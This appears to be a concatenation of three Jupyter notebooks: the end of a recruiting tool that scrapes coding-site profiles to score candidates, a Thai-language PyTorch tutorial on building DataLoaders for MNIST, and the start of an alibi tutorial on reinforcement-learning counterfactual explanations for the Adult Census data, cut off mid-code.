(df_new.style
 .set_table_styles(styles))
```
--------
## 4. Spoj
```
import requests
import bs4 as bs
#url = input('enter spoj profile url - ')
url = 'https://www.spoj.com/users/poke19962008/'
sauce = urllib.request.urlopen(url).read()
soup = bs.BeautifulSoup(sauce,'lxml') # lxml is a parser
#print(soup)
info = (soup.find_all('p'))
for i in info:
print(i.text)
no_of_questions = int(soup.find('dd').text)
print(" no. of questions = ",no_of_questions)
df_new['SPOJ_no_of_ques'] = no_of_questions
(df_new.style
.set_table_styles(styles))
```
## 5. Codebuddy
```
import requests
from bs4 import BeautifulSoup
def codebuddy(username):
    """Scrape the Codebuddy practice leaderboard for `username`.

    Returns "rank problems points" as a single space-separated string,
    or -1 when the user does not appear on the board.
    """
    URL = "https://codebuddy.co.in/ranks/practice"
    soup = BeautifulSoup(requests.get(URL).content, 'html.parser')
    for row in soup.find_all('tr'):
        cells = list(row.find_all('label'))
        # Column layout: [rank, username, problems solved, points].
        if str(cells[1].text) != username:
            continue
        rank = str(int(cells[0].text))
        solved = str(int(cells[2].text))
        points = str(float(cells[3].text))
        return rank + " " + solved + " " + points
    return (-1)
#ranking out of 2000
a = codebuddy("spectrum").split(" ")
a = pd.DataFrame(a)
a = a.transpose()
df_new['Codebuddy_rank'] = a[0].values
df_new['Codebuddy_problem_solved'] = a[1].values
df_new['Codebuddy_points'] = a[2].values
(df_new.style
.set_table_styles(styles))
```
-------
## 6. Hackerearth
```
import bs4 as bs
import urllib.request
#url = input('enter hackerearth profile url - ')
url = 'https://www.hackerearth.com/@poke19962008'
sauce = urllib.request.urlopen(url).read()
soup = bs.BeautifulSoup(sauce,'lxml') # lxml is a parser
#print(soup)
name = soup.find('h1', class_="name ellipsis larger")
print(name)
followersNo = soup.find('span', class_="track-followers-num")
followingNo = soup.find('span', class_="track-following-num")
print("No. of followers = ",followersNo)
print("No. of following = ",followingNo)
```
-------
## 7. CodeForces
```
def codeforces(username):
    """Return the Codeforces contest rating of `username`.

    Scrapes the public profile page.  Returns the sentinel 1000000 when the
    account is unrated, so rating-based scoring pushes it past every band.
    """
    head = 'http://codeforces.com/profile/'
    var = username
    URL = head + var
    page = requests.get(URL)
    soup = BeautifulSoup(page.content,'html.parser')
    listRating = list(soup.findAll('div',class_="user-rank"))
    CheckRating = listRating[0].get_text() #Check for rated or unrated
    # The exact string (with surrounding newlines) rendered for unrated users.
    if str(CheckRating) == '\nUnrated \n':
        # print('Not rated')
        out = 1000000  # sentinel: unrated
        return(out)
    else:
        # print('rated')
        # First <li> of the info block reads like "Contest rating: N (max: …)".
        listinfo = list((soup.find('div',class_="info")).findAll('li'))
        string = (listinfo[0].get_text())
        string = string.replace(" ","")
        # Strip the "(max: …)" tail, then take the digits after the colon.
        str1,str2 = string.split('(')
        str3,str4 = str1.split(':')
        out = int((str4.strip()))
        return(out)
df_new['CodeForce_ranking'] = codeforces('user')
(df_new.style
.set_table_styles(styles))
```
-------
## 8. Git-Awards Ranking
```
import requests
from bs4 import BeautifulSoup
import re
head = "http://git-awards.com/users/"
var = user
URL = head + var
page = requests.get(URL)
soup = BeautifulSoup(page.content,'html.parser')
a = list(soup.findAll('div',class_='col-md-3 info'))
b = list(soup.findAll('td'))
lang=[]
f = 0
for i in a:
c = i.text.lstrip().rstrip()
if 'your ranking' in c and f==0:
f=1
continue
if 'ranking' in c:
s=""
d = c.split(" ")
for j in d:
if j!="ranking":
s+=j+" "
lang.append(s.rstrip())
print(lang)
df_new['lang_1'] = lang[0]
df_new['lang_2'] = lang[1]
df_new['lang_3'] = lang[2]
df_new['lang_4'] = lang[3]
(df_new.style
.set_table_styles(styles))
```
(If you want to know about their work)
```
#username = input('enter github username - ')
username = user
print("Loading...")
print()
url = "https://github.com/"+username
sauce = urllib.request.urlopen(url).read()
soup = bs.BeautifulSoup(sauce,'lxml') # lxml is a parser
#print(soup)
repoNo = int(soup.find('span',class_='Counter').text)
n1 = repoNo
print("No. of repositories = ",n1)
print()
url2 = url + "?tab=repositories"
sauce = urllib.request.urlopen(url2).read()
soup = bs.BeautifulSoup(sauce,'lxml')
#print(soup)
arr = [0]
tags = soup.find_all('a', itemprop="name codeRepository")
for tag in tags:
if tag.text!="":
arr.append((tag.text).lstrip())
k=2
while(len(arr)<=n1):
url3 = url + "?page="+str(k)+"&tab=repositories"
k+=1
sauce = urllib.request.urlopen(url3).read()
soup = bs.BeautifulSoup(sauce,'lxml')
tags = soup.find_all('a', itemprop="name codeRepository")
for tag in tags:
if tag.text!="":
arr.append((tag.text).lstrip())
for i in range(1,len(arr)):
h1 = str(i) + ". "+str(arr[i])
print(h1)
(df_new.style
.set_table_styles(styles))
df_new.to_csv("final_data.csv")
```
--------
## Scoring
Next part is to score the candidates on following parameters -
- Rank (25)
- Number of problems solved (25)
- Reputation (25)
- Followers (15)
- Activity (5)
- Contributions (5)
```
df_new['stack_reputation']= df_new['stack_reputation'].apply(pd.to_numeric)
df_new['CodeChef_rating']= df_new['CodeChef_rating'].apply(pd.to_numeric)
df_new['Codebuddy_points']= df_new['Codebuddy_points'].apply(pd.to_numeric)
df_new['stack_answer_count']= df_new['stack_answer_count'].apply(pd.to_numeric)
df_new['SPOJ_no_of_ques']= df_new['SPOJ_no_of_ques'].apply(pd.to_numeric)
df_new['Codebuddy_problem_solved']= df_new['Codebuddy_problem_solved'].apply(pd.to_numeric)
df_new['CodeChef_global_rank']= df_new['CodeChef_global_rank'].apply(pd.to_numeric)
df_new['CodeChef_Country_rank']= df_new['CodeChef_Country_rank'].apply(pd.to_numeric)
df_new['Codebuddy_rank']= df_new['Codebuddy_rank'].apply(pd.to_numeric)
df_new['CodeForce_ranking']= df_new['CodeForce_ranking'].apply(pd.to_numeric)
df_res = df_new.filter(['email'], axis=1)
```
## 1. Reputation
```
df_new.loc[ df_new['stack_reputation'] >= 360 , 'score_rep_1'] = 10
df_new.loc[ (df_new['stack_reputation'] < 359) & (df_new['stack_reputation'] >= 150) , 'score_rep_1'] = 5
df_new.loc[ (df_new['stack_reputation'] < 149) & (df_new['stack_reputation'] >= 100) , 'score_rep_1'] = 2
df_new.loc[ df_new['CodeChef_rating'] > 1500 , 'score_rep_2'] = 10
df_new.loc[ (df_new['CodeChef_rating'] < 1499) & (df_new['CodeChef_rating'] >= 1000) , 'score_rep_2'] = 5
df_new.loc[ (df_new['CodeChef_rating'] < 999) & (df_new['CodeChef_rating'] >= 500) , 'score_rep_2'] = 2
df_new.loc[ df_new['Codebuddy_points'] > 100 , 'score_rep_3'] = 5
df_new.loc[ (df_new['Codebuddy_points'] < 99) & (df_new['Codebuddy_points'] >= 50) , 'score_rep_3'] = 2
df_new.loc[ (df_new['Codebuddy_points'] < 49) & (df_new['Codebuddy_points'] >= 20) , 'score_rep_3'] = 1
df_res['score_rep'] = df_new['score_rep_1'] + df_new['score_rep_2'] + df_new['score_rep_3']
df_res
```
-----
## 2. Number of Problems Solved
```
df_new.loc[ df_new['stack_answer_count'] >= 20 , 'score_ps_1'] = 9
df_new.loc[ (df_new['stack_answer_count'] < 20) & (df_new['stack_answer_count'] >= 10) , 'score_ps_1'] = 5
df_new.loc[ (df_new['stack_answer_count'] < 10) & (df_new['stack_answer_count'] >= 5) , 'score_ps_1'] = 3
df_new.loc[ df_new['SPOJ_no_of_ques'] >= 10 , 'score_ps_2'] = 8
df_new.loc[ (df_new['SPOJ_no_of_ques'] < 9) & (df_new['SPOJ_no_of_ques'] >= 5) , 'score_ps_2'] = 4
df_new.loc[ (df_new['SPOJ_no_of_ques'] < 5) & (df_new['SPOJ_no_of_ques'] >= 2) , 'score_ps_2'] = 2
df_new.loc[ df_new['Codebuddy_problem_solved'] >= 50 , 'score_ps_3'] = 8
df_new.loc[ (df_new['Codebuddy_problem_solved'] < 49) & (df_new['Codebuddy_problem_solved'] >= 25) , 'score_ps_3'] = 4
df_new.loc[ (df_new['Codebuddy_problem_solved'] < 24) & (df_new['Codebuddy_problem_solved'] >= 10) , 'score_ps_3'] = 2
df_res['score_ps'] = df_new['score_ps_1'] + df_new['score_ps_2'] + df_new['score_ps_3']
df_res
```
------
## 3. Ranking
```
df_new.loc[ df_new['CodeChef_global_rank'] <= 5000 , 'score_rank_1'] = 7
df_new.loc[ (df_new['CodeChef_global_rank'] > 5000) & (df_new['CodeChef_global_rank'] <= 15000) , 'score_rank_1'] = 4
df_new.loc[ (df_new['CodeChef_global_rank'] > 15000) & (df_new['CodeChef_global_rank'] <= 25000) , 'score_rank_1'] = 2
df_new.loc[ df_new['CodeChef_Country_rank'] <= 2000 , 'score_rank_2'] = 6
df_new.loc[ (df_new['CodeChef_Country_rank'] > 2000) & (df_new['CodeChef_Country_rank'] <= 7000) , 'score_rank_2'] = 3
df_new.loc[ (df_new['CodeChef_Country_rank'] > 7000) & (df_new['CodeChef_Country_rank'] <= 15000) , 'score_rank_2'] = 1
df_new.loc[ df_new['Codebuddy_rank'] <= 50 , 'score_rank_3'] = 6
df_new.loc[ (df_new['Codebuddy_rank'] > 50) & (df_new['Codebuddy_rank'] <= 250) , 'score_rank_3'] = 3
df_new.loc[ (df_new['Codebuddy_rank'] > 250) & (df_new['Codebuddy_rank'] <= 500) , 'score_rank_3'] = 1
df_new.loc[ df_new['CodeForce_ranking'] <= 500 , 'score_rank_4'] = 6
df_new.loc[ (df_new['CodeForce_ranking'] > 500) & (df_new['CodeForce_ranking'] <= 2000) , 'score_rank_4'] = 3
df_new.loc[ (df_new['CodeForce_ranking'] > 2000) & (df_new['CodeForce_ranking'] <= 5000) , 'score_rank_4'] = 1
df_res['score_rank'] = df_new['score_rank_1'] + df_new['score_rank_2'] + df_new['score_rank_3'] + df_new['score_rank_4']
df_res
```
-------
## 4. Activity
```
df_new['updated_at'] = df_new['updated_at'].apply(pd.to_datetime)
df_new['updated_at']
df_new['updated_at'] = df_new['updated_at'].dt.date
df_new['updated_at'] = df_new['updated_at'].apply(pd.to_datetime)
df_new['updated_at']
df_new['current_date'] = '2018-06-24'
df_new['current_date']= df_new['current_date'].apply(pd.to_datetime)
df_new['current_date']
from datetime import date

# Days since the candidate's GitHub profile was last updated.
# Bug fix: the original stringified the Timedelta and kept only its FIRST
# character, so "12 days" scored as 1 day and "123 days" also as 1 day.
# `.dt.days` extracts the full integer day count directly.
df_new['last_active'] = (df_new['current_date'] - df_new['updated_at']).dt.days
df_new['last_active']
# Score recency of activity (max 5 points).
# Bug fix: the first two bands previously left a hole at exactly 8 days
# (<= 7 vs > 8); the bands are now contiguous.
df_new.loc[df_new['last_active'] <= 7, 'score_activity_1'] = 5
df_new.loc[(df_new['last_active'] > 7) & (df_new['last_active'] <= 15), 'score_activity_1'] = 3
df_new.loc[(df_new['last_active'] > 15) & (df_new['last_active'] <= 30), 'score_activity_1'] = 1
df_res['score_activity'] = df_new['score_activity_1']
```
--------
## 5. Followers
```
df_new.loc[ df_new['followers'] >= 200 , 'score_followers_1'] = 15
df_new.loc[ (df_new['followers'] < 200) & (df_new['followers'] >= 50) , 'score_followers_1'] = 10
df_new.loc[ (df_new['followers'] < 50) & (df_new['followers'] >= 30) , 'score_followers_1'] = 5
df_res['score_followers'] = df_new['score_followers_1']
df_res
```
------
## 6. Contributions
```
# Score open-source contributions from the public repository count (max 5).
# Bug fix: the second and third bands tested the `followers` column (a
# copy-paste from the Followers section above) even though this section
# scores contributions; all three bands now use `public_repos`.
df_new.loc[df_new['public_repos'] >= 30, 'score_con_1'] = 5
df_new.loc[(df_new['public_repos'] < 30) & (df_new['public_repos'] >= 10), 'score_con_1'] = 3
df_new.loc[(df_new['public_repos'] < 10) & (df_new['public_repos'] >= 3), 'score_con_1'] = 1
df_res['score_contributions'] = df_new['score_con_1']
df_res
```
-------
## 7. Final Score
```
df_res['total_score'] = df_res['score_rep'] + df_res['score_ps'] + df_res['score_rank'] + df_res['score_activity'] + df_res['score_followers'] + df_res['score_contributions']
(df_res.style
.applymap(color_negative_red, subset=['total_score'])
.set_table_styles(styles))
```
-------
-------
## Demo
- Visualizing candidates perfomance throughs charts and graphs
-------
-------
## Tech Stack
- Python: BeautifulSoup, Urllib, Pandas, Scipy
- D3.js
-------
-------
## What's Next?
- Scorey for non technical recruitments - Sales, Marketing and HR
- Integrating Machine learning components for rule generation
- Handling missing data exceptions dynamically
-------
-------
Thank you!
| github_jupyter |
# 0. Magic
```
%load_ext autoreload
%autoreload 2
%matplotlib inline
```
# 1. Import
```
import torch
from torch import tensor
from torch import nn
import torch.nn.functional as F
from torch.utils import data
import matplotlib.pyplot as plt
from pathlib import Path
from IPython.core.debugger import set_trace
from fastai import datasets
from fastai.metrics import accuracy
import pickle, gzip, math, torch
import operator
```
# 2. Data
```
MNIST_URL='http://deeplearning.net/data/mnist/mnist.pkl'

def get_data():
    """Download MNIST via fastai and return (x_train, y_train, x_valid, y_valid).

    Returns a lazy `map` of torch tensors in that order.
    NOTE(review): deeplearning.net mirrors of mnist.pkl have been unreliable —
    confirm the URL still resolves before relying on this.
    """
    path = datasets.download_data(MNIST_URL, ext='.gz')
    with gzip.open(path, 'rb') as f:
        # Pickle layout is ((train), (valid), (test)); the test split is discarded.
        ((x_train, y_train), (x_valid, y_valid), _) = pickle.load(f, encoding='latin-1')
    return map(tensor, (x_train, y_train, x_valid, y_valid))
x_train, y_train, x_valid, y_valid = get_data()
```
# 3. เตรียม Data
```
class Dataset(data.Dataset):
    """Minimal map-style dataset pairing inputs `x` with targets `y`."""

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def __len__(self):
        """Number of samples (length of the input container)."""
        return len(self.x)

    def __getitem__(self, i):
        """Return the (input, target) pair at position `i`."""
        return self.x[i], self.y[i]
class DataLoader():
    """Yield successive slices of size `bs` from dataset `ds`."""

    def __init__(self, ds, bs):
        self.ds = ds
        self.bs = bs

    def __iter__(self):
        start = 0
        total = len(self.ds)
        while start < total:
            yield self.ds[start:start + self.bs]
            start += self.bs
# x = data, m = mean, s = standard deviation
def normalize(x, m, s):
    """Standardize `x` using mean `m` and standard deviation `s`."""
    centered = x - m
    return centered / s
n, m = x_train.shape
c = (y_train.max()+1).numpy()
n, m, c
train_mean, train_std = x_train.mean(), x_train.std()
x_train = normalize(x_train, train_mean, train_std)
x_valid = normalize(x_valid, train_mean, train_std)
# batch size
bs = 64
train_ds, valid_ds = Dataset(x_train, y_train), Dataset(x_valid, y_valid)
train_dl, valid_dl = DataLoader(train_ds, bs), DataLoader(valid_ds, bs)
```
# 4. สร้าง Model
Hyperparameter ของโมเดล
```
# learning rate
lr = 0.03
epoch = 1
nh = 50
```
ประกาศฟังก์ชันเอาไว้สร้างโมเดล
```
def get_model():
    """Build a one-hidden-layer MLP classifier and its loss function.

    Reads the notebook globals `m` (input features), `nh` (hidden units)
    and `c` (number of classes). Returns `(model, loss_func)`.
    """
    model = nn.Sequential(
        nn.Linear(m, nh),
        nn.ReLU(),
        nn.Linear(nh, c),
    )
    return model, F.cross_entropy
```
# 5. Training Loop
เราจะเทรนโมเดล ด้วยอัลกอริทึม [Stochastic Gradient Descent (SGD)](https://www.bualabs.com/wp-admin/post.php?post=631&action=edit) และ เก็บ Loss, Accuracy เอาไว้พล็อตกราฟ
ประกาศฟังก์ชัน fit เอาไว้เรียกเทรนเวลาที่ต้องการ
```
def fit():
    """Train `model` on `train_dl` with `optim`, then plot loss/accuracy.

    Relies on the notebook globals: `epoch`, `train_dl`, `model`,
    `loss_func`, `optim`, `accuracy` and `plot_metrics`.
    """
    loss_history = []
    acc_history = []
    for _ in range(epoch):
        for xb, yb in train_dl:
            # Forward pass
            preds = model(xb)
            batch_loss = loss_func(preds, yb)
            # Record per-batch metrics for the plot at the end
            loss_history.append(batch_loss)
            acc_history.append(accuracy(preds, yb))
            # Backpropagation and SGD update, then clear gradients
            batch_loss.backward()
            optim.step()
            optim.zero_grad()
    plot_metrics(loss_history, acc_history)
```
ประกาศฟังก์ชัน ไว้พล็อตกราฟ Loss และ Accuracy
```
def plot_metrics(losses, metrics):
    """Plot per-batch loss and accuracy curves on one shared axis."""
    steps = torch.arange(len(losses)).numpy()
    fig, ax = plt.subplots(figsize=(9, 9))
    ax.grid(True)
    # One line per metric, indexed by training step.
    ax.plot(steps, losses, label="Loss")
    ax.plot(steps, metrics, label="Accuracy")
    ax.legend(loc='upper right')
```
# 6. Refactor DataLoader
## 6.1 Random Sampler
ในการเทรนโมเดล เราควรสับเปลี่ยนกองข้อมูล เหมือนสับไพ่ ให้ลำดับข้อมูลตัวอย่างไม่เหมือนกันทุกครั้ง ก่อนที่จะป้อนให้กับโมเดล
```
class Sampler():
    """Yield batches of dataset indices, reshuffled each epoch if requested."""

    # ds = Dataset, bs = Batch Size, n = Length of Dataset
    def __init__(self, ds, bs, shuffle=False):
        self.n = len(ds)
        self.bs = bs
        self.shuffle = shuffle

    def __iter__(self):
        # A fresh permutation per epoch when shuffling, else sequential order.
        if self.shuffle:
            self.idxs = torch.randperm(self.n)
        else:
            self.idxs = torch.arange(self.n)
        start = 0
        while start < self.n:
            yield self.idxs[start:start + self.bs]
            start += self.bs
small_ds = Dataset(*train_ds[:10])
```
เทสแบบไม่สับเปลี่ยน
```
s = Sampler(small_ds, 3, shuffle=False)
[o for o in s]
```
เทสแบบสับเปลี่ยน
```
s = Sampler(small_ds, 3, shuffle=True)
[o for o in s]
```
## 6.2 Collate
เมื่อเราสับเปลี่ยนข้อมูลออกมาจากกอง Dataset เป็น (x7, y7), (x3, y3), (x1, y1), (...) แล้ว เราต้องมีฟังก์ชันเล็ก ๆ ใน DataLoader ในการรวมเป็นกองเล็ก ๆ ขึ้นมาใหม่ เป็น Mini-Batch (x7, x3, x1, ...), (y7, y3, y1, ...) ก่อนส่งให้กับโมเดล
```
def collate(b):
    """Stack a list of `(x, y)` pairs into batched `x` and `y` tensors."""
    xs = [x for x, _ in b]
    ys = [y for _, y in b]
    return torch.stack(xs), torch.stack(ys)
```
เพิ่ม Feature ให้กับ DataLoader ในการรับ Sampler และ Collate
```
class DataLoader2():
    """DataLoader driven by an index `sampler` and a `collate_fn`.

    For each index batch produced by the sampler, gathers the matching
    items from `ds` and collates them into a mini-batch.
    """

    def __init__(self, ds, sampler, collate_fn=collate):
        self.ds = ds
        self.sampler = sampler
        self.collate_fn = collate_fn

    def __iter__(self):
        for idx_batch in self.sampler:
            items = [self.ds[i] for i in idx_batch]
            yield self.collate_fn(items)
```
เรามักจะ Shuffle ข้อมูล Training Set แต่ Validation Set ไม่จำเป็นต้อง Shuffle
```
train_samp = Sampler(train_ds, bs, shuffle=True)
valid_samp = Sampler(valid_ds, bs, shuffle=False)
# train_dl = Training Set DataLoader, valid_dl = Validation Set DataLoader
train_dl = DataLoader2(train_ds, train_samp, collate)
valid_dl = DataLoader2(valid_ds, valid_samp, collate)
xb, yb = next(iter(train_dl))
yb[0], plt.imshow(xb[0].view(28, 28))
xb, yb = next(iter(train_dl))
yb[0], plt.imshow(xb[0].view(28, 28))
model, loss_func = get_model()
optim = torch.optim.SGD(model.parameters(), lr=lr)
fit()
```
## 6.3 PyTorch DataLoader
```
from torch.utils import data
```
PyTorch DataLoader สามารถรับ shuffle=True/False หรือ รับเป็น class RandomSampler/SequentialSampler ก็ได้
```
# train_dl = data.DataLoader(train_ds, bs, shuffle=True, collate_fn=collate)
# valid_dl = data.DataLoader(valid_ds, bs, shuffle=False, collate_fn=collate)
train_dl = data.DataLoader(train_ds, bs, sampler=data.RandomSampler(train_ds), collate_fn=collate, num_workers=8)
valid_dl = data.DataLoader(valid_ds, bs, sampler=data.SequentialSampler(valid_ds), collate_fn=collate, num_workers=8)
```
เราสามารถ ใช้ num_workers เพื่อกำหนดให้ PyTorch DataLoader แตก SubProcess เพื่อช่วยโหลดข้อมูลแบบขนาน ทำให้โหลดข้อมูลขนาดใหญ่ได้เร็วขึ้น
```
model, loss_func = get_model()
optim = torch.optim.SGD(model.parameters(), lr=lr)
fit()
```
# 7. สรุป
1. ในการเทรนโมเดล แต่ละ Epoch เราไม่ควรป้อนข้อมูลเหมือน ๆ กันทุกครั้งให้โมเดล เราจึงได้สร้าง DataLoader เวอร์ชันใหม่ ที่จะสับไพ่ข้อมูลตัวอย่างก่อนป้อนให้โมเดล
1. ในการสับไพ่ข้อมูล จำเป็นต้องมีกระบวนการนำข้อมูลมารวมกันใหม่ เรียกว่า Collate
1. DataLoader ของ PyTorch จัดการปัญหาพวกนี้ให้เราหมด พร้อมทั้งมี Feature num_workers เพิ่มความเร็วในการโหลดข้อมูล แบบขนาน
# Credit
* https://course.fast.ai/videos/?lesson=9
* https://pytorch.org/docs/stable/data.html
```
```
| github_jupyter |
# Counterfactual with Reinforcement Learning (CFRL) on Adult Census
This method is described in [Model-agnostic and Scalable Counterfactual Explanations via Reinforcement Learning](https://arxiv.org/abs/2106.02597) and can generate counterfactual instances for any black-box model. The usual optimization procedure is transformed into a learnable process allowing to generate batches of counterfactual instances in a single forward pass even for high dimensional data. The training pipeline is model-agnostic and relies only on prediction feedback by querying the black-box model. Furthermore, the method allows target and feature conditioning.
**We exemplify the use case for the TensorFlow backend. This means that all models: the autoencoder, the actor and the critic are TensorFlow models. Our implementation supports PyTorch backend as well.**
CFRL uses [Deep Deterministic Policy Gradient (DDPG)](https://arxiv.org/abs/1509.02971) by interleaving a state-action function approximator called the critic, with learning an approximator called the actor to predict the optimal action. The method assumes that the critic is differentiable with respect to the action argument, thus allowing the actor's parameters to be optimized efficiently through gradient-based methods.
The DDPG algorithm requires two separate networks, an actor $\mu$ and a critic $Q$. Given the encoded representation of the input instance $z = enc(x)$, the model prediction $y_M$, the target prediction
$y_T$ and the conditioning vector $c$, the actor outputs the counterfactual’s latent representation $z_{CF} = \mu(z, y_M, y_T, c)$. The decoder then projects the embedding $z_{CF}$ back to the original input space,
followed by optional post-processing.
The training step consists of simultaneously optimizing the actor and critic networks. The critic regresses on the reward $R$ determined by the model prediction, while the actor maximizes the critic’s output for the given instance through $L_{max}$. The actor also minimizes two objectives to encourage the generation of sparse, in-distribution counterfactuals. The sparsity loss $L_{sparsity}$ operates on the decoded counterfactual $x_{CF}$ and combines the $L_1$ loss over the standardized numerical features and the $L_0$ loss over the categorical ones. The consistency loss $L_{consist}$ aims to encode the counterfactual $x_{CF}$ back to the same latent representation where it was decoded from and helps to produce in-distribution counterfactual instances. Formally, the actor's loss can be written as:
$L_{actor} = L_{max} + \lambda_{1}L_{sparsity} + \lambda_{2}L_{consistency}$
This example will use the [xgboost](https://github.com/dmlc/xgboost) library, which can be installed with:
```
!pip install xgboost
import os
import numpy as np
import pandas as pd
from copy import deepcopy
from typing import List, Tuple, Dict, Callable
import tensorflow as tf
import tensorflow.keras as keras
from sklearn.compose import ColumnTransformer
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from xgboost import XGBClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
from alibi.explainers import CounterfactualRLTabular, CounterfactualRL
from alibi.datasets import fetch_adult
from alibi.models.tensorflow.autoencoder import HeAE
from alibi.models.tensorflow.actor_critic import Actor, Critic
from alibi.models.tensorflow.cfrl_models import ADULTEncoder, ADULTDecoder
from alibi.explainers.cfrl_base import Callback
from alibi.explainers.backends.cfrl_tabular import get_he_preprocessor, get_statistics, \
get_conditional_vector, apply_category_mapping
```
### Load Adult Census Dataset
```
# Fetch adult dataset
adult = fetch_adult()
# Separate columns in numerical and categorical.
categorical_names = [adult.feature_names[i] for i in adult.category_map.keys()]
categorical_ids = list(adult.category_map.keys())
numerical_names = [name for i, name in enumerate(adult.feature_names) if i not in adult.category_map.keys()]
numerical_ids = [i for i in range(len(adult.feature_names)) if i not in adult.category_map.keys()]
# Split data into train and test
X, Y = adult.data, adult.target
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=13)
```
### Train black-box classifier
```
# Define numerical standard scaler.
num_transf = StandardScaler()
# Define categorical one-hot encoder.
cat_transf = OneHotEncoder(
categories=[range(len(x)) for x in adult.category_map.values()],
handle_unknown="ignore"
)
# Define column transformer
preprocessor = ColumnTransformer(
transformers=[
("cat", cat_transf, categorical_ids),
("num", num_transf, numerical_ids),
],
sparse_threshold=0
)
# Fit preprocessor.
preprocessor.fit(X_train)
# Preprocess train and test dataset.
X_train_ohe = preprocessor.transform(X_train)
X_test_ohe = preprocessor.transform(X_test)
# Select one of the below classifiers.
# clf = XGBClassifier(min_child_weight=0.5, max_depth=3, gamma=0.2)
# clf = LogisticRegression(C=10)
# clf = DecisionTreeClassifier(max_depth=10, min_samples_split=5)
clf = RandomForestClassifier(max_depth=15, min_samples_split=10, n_estimators=50)
# Fit the classifier.
clf.fit(X_train_ohe, Y_train)
```
### Define the predictor (black-box)
Now that we've trained the classifier, we can define the black-box model. Note that the output of the black-box is a distribution which can be either a soft-label distribution (probabilities/logits for each class) or a hard-label distribution (one-hot encoding). Internally, CFRL takes the `argmax`. Moreover the output **DOES NOT HAVE TO BE DIFFERENTIABLE**.
```
# Define prediction function.
predictor = lambda x: clf.predict_proba(preprocessor.transform(x))
# Compute accuracy.
acc = accuracy_score(y_true=Y_test, y_pred=predictor(X_test).argmax(axis=1))
print("Accuracy: %.3f" % acc)
```
### Define and train autoencoder
Instead of directly modelling the perturbation vector in the potentially high-dimensional input space, we first train an autoencoder. The weights of the encoder are frozen and the actor applies the
counterfactual perturbations in the latent space of the encoder. The pre-trained decoder maps the counterfactual embedding back to the input feature space.
The autoencoder follows a standard design. The model is composed from two submodules, the encoder and the decoder. The forward pass consists of passing the input to the encoder, obtain the input embedding and pass the embedding through the decoder.
```python
class HeAE(keras.Model):
    """Heterogeneous autoencoder: encode the input, then decode it back."""

    def __init__(self, encoder: keras.Model, decoder: keras.Model, **kwargs) -> None:
        super().__init__(**kwargs)
        self.encoder = encoder
        self.decoder = decoder

    def call(self, x: tf.Tensor, **kwargs):
        # Forward pass: input -> latent embedding -> reconstruction.
        return self.decoder(self.encoder(x))
```
The heterogeneous variant used in this example uses an additional type checking to ensure that the output of the decoder is a list of tensors.
Heterogeneous datasets require special treatment. In this work we modeled the numerical features by normal distributions with constant standard deviation and categorical features by categorical distributions. Due to the choice of feature modeling, some numerical features can end up having different types than the original numerical features. For example, a feature like `Age` having the type of `int` can become a `float` due to the autoencoder reconstruction (e.g., `Age=26 -> Age=26.3`). This behavior can be undesirable. Thus we performed casting when processing the output of the autoencoder (decoder component).
```
# Define attribute types, required for datatype conversion.
feature_types = {"Age": int, "Capital Gain": int, "Capital Loss": int, "Hours per week": int}
# Define data preprocessor and inverse preprocessor. The invers preprocessor include datatype conversions.
heae_preprocessor, heae_inv_preprocessor = get_he_preprocessor(X=X_train,
feature_names=adult.feature_names,
category_map=adult.category_map,
feature_types=feature_types)
# Define trainset
trainset_input = heae_preprocessor(X_train).astype(np.float32)
trainset_outputs = {
"output_1": X_train_ohe[:, :len(numerical_ids)]
}
for i, cat_id in enumerate(categorical_ids):
trainset_outputs.update({
f"output_{i+2}": X_train[:, cat_id]
})
trainset = tf.data.Dataset.from_tensor_slices((trainset_input, trainset_outputs))
trainset = trainset.shuffle(1024).batch(128, drop_remainder=True)
# Define autoencoder path and create dir if it doesn't exist.
heae_path = os.path.join("tensorflow", "ADULT_autoencoder")
if not os.path.exists(heae_path):
os.makedirs(heae_path)
# Define constants.
EPOCHS = 50 # epochs to train the autoencoder
HIDDEN_DIM = 128 # hidden dimension of the autoencoder
LATENT_DIM = 15 # define latent dimension
# Define output dimensions.
OUTPUT_DIMS = [len(numerical_ids)]
OUTPUT_DIMS += [len(adult.category_map[cat_id]) for cat_id in categorical_ids]
# Define the heterogeneous auto-encoder.
heae = HeAE(encoder=ADULTEncoder(hidden_dim=HIDDEN_DIM, latent_dim=LATENT_DIM),
decoder=ADULTDecoder(hidden_dim=HIDDEN_DIM, output_dims=OUTPUT_DIMS))
# Define loss functions.
he_loss = [keras.losses.MeanSquaredError()]
he_loss_weights = [1.]
# Add categorical losses.
for i in range(len(categorical_names)):
he_loss.append(keras.losses.SparseCategoricalCrossentropy(from_logits=True))
he_loss_weights.append(1./len(categorical_names))
# Define metrics.
metrics = {}
for i, cat_name in enumerate(categorical_names):
metrics.update({f"output_{i+2}": keras.metrics.SparseCategoricalAccuracy()})
# Compile model.
heae.compile(optimizer=keras.optimizers.Adam(learning_rate=1e-3),
loss=he_loss,
loss_weights=he_loss_weights,
metrics=metrics)
if len(os.listdir(heae_path)) == 0:
# Fit and save autoencoder.
heae.fit(trainset, epochs=EPOCHS)
heae.save(heae_path, save_format="tf")
else:
# Load the model.
heae = keras.models.load_model(heae_path, compile=False)
```
### Counterfactual with Reinforcement Learning
```
# Define constants
COEFF_SPARSITY = 0.5               # sparsity coefficient (weight of L_sparsity in the actor loss)
COEFF_CONSISTENCY = 0.5            # consistency coefficient (weight of L_consistency in the actor loss)
TRAIN_STEPS = 10000                # number of training steps -> consider increasing the number of steps
BATCH_SIZE = 100                   # batch size
```
#### Define dataset specific attributes and constraints
A desirable property of a method for generating counterfactuals is to allow feature conditioning. Real-world datasets usually include immutable features such as `Sex` or `Race`, which should remain unchanged throughout the counterfactual search procedure. Similarly, a numerical feature such as `Age` should only increase for a counterfactual to be actionable.
```
# Define immutable features.
immutable_features = ['Marital Status', 'Relationship', 'Race', 'Sex']
# Define ranges. This means that the `Age` feature can not decrease.
ranges = {'Age': [0.0, 1.0]}
```
#### Define and fit the explainer
```
explainer = CounterfactualRLTabular(predictor=predictor,
encoder=heae.encoder,
decoder=heae.decoder,
latent_dim=LATENT_DIM,
encoder_preprocessor=heae_preprocessor,
decoder_inv_preprocessor=heae_inv_preprocessor,
